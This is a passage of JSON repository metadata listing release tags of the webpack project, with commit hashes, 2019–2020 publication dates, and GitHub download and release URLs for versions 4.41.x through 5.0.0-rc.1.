8:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https:/